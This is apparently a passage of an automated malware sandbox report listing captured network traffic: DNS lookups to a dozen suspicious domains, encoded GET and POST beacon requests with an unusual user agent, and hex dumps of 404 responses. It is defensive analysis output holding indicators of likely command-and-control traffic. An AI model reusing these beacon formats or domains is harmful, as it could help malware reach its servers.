              Source: global trafficHTTP traffic detected: GET /8rr3/?R4Stj2k=iJ8hmWjdEFuk0u06tRtBw99RNA0cmJToU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH4gP8KF2Qn8j/cmS57RgWwvqcfmQWCIyf50xkCSEufT28mA==&ml=PF-8nXUHD HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cifasnc.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficDNS traffic detected: DNS query: www.gayhxi.info
              Source: global trafficDNS traffic detected: DNS query: www.promocao.info
              Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
              Source: global trafficDNS traffic detected: DNS query: www.44756.pizza
              Source: global trafficDNS traffic detected: DNS query: www.lonfor.website
              Source: global trafficDNS traffic detected: DNS query: www.investshares.net
              Source: global trafficDNS traffic detected: DNS query: www.nosolofichas.online
              Source: global trafficDNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
              Source: global trafficDNS traffic detected: DNS query: www.adadev.info
              Source: global trafficDNS traffic detected: DNS query: www.cifasnc.info
              Source: global trafficDNS traffic detected: DNS query: www.ebsmadrid.store
              Source: unknownHTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 52 34 53 74 6a 32 6b 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 74 65 41 35 69 76 33 4c 65 4b 6e 54 61 5a 4e 73 42 56 63 79 69 5a 76 53 4e 55 45 56 54 70 63 30 51 67 46 4f 51 34 3d Data Ascii: R4Stj2k=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvteA5iv3LeKnTaZNsBVcyiZvSNUEVTpc0QgFOQ4=
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vWG%2FSM8qJ0DRVt5wzWoyamKXhz3Ag3gSbxVeTagXjq3%2B5PrmISaX54wrBoJ3ZPH5nrh19ZNPqmVnkolCU1LTFSuluDzVn5xn7eDyT9Ram51Ej17c0uZPyyy0j0SEkO4zXlk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb6780d46ab45-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13728&min_rtt=13728&rtt_var=6864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dG9Q%2Br8K4ZDKEBQ1kr%2FZqJy8tvBunTC4GIqYr%2BQgA0N34%2FARRgRfiV8pdBAoTUSJme3z%2Be%2FXzOOqFtSAoRXUp8DfFwhwq95Z%2BJYTxEaLPJA2ovqgVfXdt8aL6O1lC2U9Piox"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb687e8445890-IADContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7243&min_rtt=7243&rtt_var=3621&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P77ltRN%2BFyuc2GmUt6LAw4BVJS6TT2sWZwrK7mNOXF143G%2BlRLHUdpHYjV3MPKqMEfu34N9MoAWoTUn8DLCE1GebXO0qzUWzhw9ddzsBnVwi9J%2FTO8t%2BS1Xx7%2BrULGVYboSp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb6980c7faadf-YYZContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14118&min_rtt=14118&rtt_var=7059&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1777&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B316oEP6nehNekEPmV%2BueJXQ7ST3BIWGP1zZddQCxxnZC%2BQF4Tb%2B9Q3Xw8GVS2DbsDLhyt5Dh6yTSFKbjLkuh6hws%2FhQ7GY09otUCyw3k1va%2F3i%2BcrKjXi9m1XMkL1zFjxhg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 902cb6a7db15ab5a-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13632&min_rtt=13632&rtt_var=6816&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:25:17 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:25:20 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:25:23 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Thu, 16 Jan 2025 08:25:25 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:31 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:33 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:36 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 